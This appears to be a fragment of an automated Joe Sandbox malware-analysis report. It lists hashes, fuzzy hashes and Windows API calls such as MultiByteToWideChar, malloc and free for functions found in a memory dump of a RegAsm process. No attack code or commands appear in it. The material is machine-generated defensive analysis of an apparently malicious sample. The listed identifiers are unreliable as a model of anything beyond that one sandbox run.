                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: ??2@
                                                • String ID:
                                                • API String ID: 1033339047-0
                                                • Opcode ID: 6589a97820dd4164dbe9b7b561e5d9da651562f836a554c3bd3b183484c6dcee
                                                • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                • Opcode Fuzzy Hash: 6589a97820dd4164dbe9b7b561e5d9da651562f836a554c3bd3b183484c6dcee
                                                • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                                Function 004173E4 Relevance: 5.0, APIs: 4, Instructions: 41COMMON
                                                Download Yara Rule
                                                APIs
                                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                • malloc.MSVCRT ref: 00417407
                                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                • free.MSVCRT ref: 00417425
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: ByteCharMultiWide$freemalloc
                                                • String ID:
                                                • API String ID: 2605342592-0
                                                • Opcode ID: 3df1ff1ad5f7619570b5295ff2d6745c95529d6511ab958c6202ec18d606cc9c
                                                • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                                • Opcode Fuzzy Hash: 3df1ff1ad5f7619570b5295ff2d6745c95529d6511ab958c6202ec18d606cc9c
                                                • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5